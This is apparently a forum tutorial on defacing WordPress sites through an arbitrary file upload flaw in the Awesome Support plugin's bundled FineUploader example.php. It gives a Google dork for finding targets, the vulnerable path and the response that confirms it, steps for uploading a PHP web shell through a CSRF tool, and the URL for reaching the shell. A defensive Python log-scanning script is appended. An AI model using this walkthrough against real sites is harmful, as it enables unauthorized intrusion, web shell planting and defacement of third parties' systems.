Deface WordPress Awesome Support

5/18/2019
*Arbitrary File Upload Vulnerability*

Materials:
- Dork:
inurl:/wp-content/plugins/awesome-support/
Develop it further yourself.
- CSRF
- Shell

Vuln check/exploit:
http://sitetarget.co.li/[path]/wp-content/plugins/awesome-support/plugins/jquery.fineuploader-3.5.0/server/php/example.php
_pay attention to the path_

Step by Step:
1. Dork using the dork above and pick a target that you think is vulnerable.

2. Put the exploit path after the target site, as in the example above.

3. If it is vulnerable, the text *"error";"no files were uploaded","uploadname"inull* will appear.

4. Copy the target URL from the address bar, then go to an online CSRF tool.

5. Enter the URL in the URL field, then for Post File choose qqfile.

6. Choose the file/shell or something else :)

7. Click Upload :) If it is vulnerable, the result will show the text *"success";true,"uploadname":"shell.php*

8. Access the shell: http://sitetarget.co.li/[path]/wp-content/plugins/awesome-support/plugins/jquery.fineuploader-3.5.0/server/php/uploads/namashell.php

9. Done.
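
For defenders, the request sequence in the steps above (a POST to the bundled `example.php`, then a request for a script under `uploads/`) is easy to find in web server access logs. The following is an added example, not part of the original post: the two paths come from the write-up, while the log lines, IP addresses, file names and function names are constructed for illustration, and the common/combined log format is an assumption.

```python
import re

# Paths come from the write-up above; everything else is constructed.
UPLOADER = "/jquery.fineuploader-3.5.0/server/php/example.php"
UPLOAD_DIR = "/jquery.fineuploader-3.5.0/server/php/uploads/"
SCRIPT_EXT = (".php", ".phtml", ".php5", ".phar")
BASE = "/wp-content/plugins/awesome-support/plugins"
# Assumed common/combined format: ip - - [time] "METHOD path PROTO" status size
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) ')

SAMPLE_LOG = f"""\
198.51.100.7 - - [18/May/2019:10:01:02 +0000] "GET {BASE}{UPLOADER} HTTP/1.1" 200 58
198.51.100.7 - - [18/May/2019:10:02:10 +0000] "POST {BASE}{UPLOADER} HTTP/1.1" 200 47
203.0.113.20 - - [18/May/2019:10:02:30 +0000] "GET /wp-login.php HTTP/1.1" 200 2301
198.51.100.7 - - [18/May/2019:10:03:00 +0000] "GET {BASE}{UPLOAD_DIR}upload1.php HTTP/1.1" 200 1204
203.0.113.20 - - [18/May/2019:10:04:00 +0000] "GET {BASE}{UPLOAD_DIR}photo.png HTTP/1.1" 404 0
"""

def classify(method, path):
    """Map one request to a finding type, or None if it is unrelated."""
    path = path.split("?", 1)[0].lower()
    if path.endswith(UPLOADER):
        return "upload_post" if method == "POST" else "probe"
    if UPLOAD_DIR in path and path.endswith(SCRIPT_EXT):
        return "script_in_uploads"
    return None

def scan(log_text):
    """Return {client_ip: [(kind, time, status), ...]} in log order."""
    findings = {}
    for m in filter(None, map(LINE_RE.match, log_text.splitlines())):
        ip, when, method, path, status = m.groups()
        kind = classify(method.upper(), path)
        if kind:
            findings.setdefault(ip, []).append((kind, when, int(status)))
    return findings

def review_first(findings):
    """Clients with a 2xx upload POST followed by a 2xx script request in uploads/."""
    hits = []
    for ip, events in findings.items():
        ok = [kind for kind, _, status in events if 200 <= status < 300]
        if "upload_post" in ok and "script_in_uploads" in ok[ok.index("upload_post"):]:
            hits.append(ip)
    return sorted(hits)

if __name__ == "__main__":
    print(review_first(scan(SAMPLE_LOG)))
```

A `script_in_uploads` event with a 2xx status means a script file exists in that directory and was served, so the directory should be inspected on disk.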
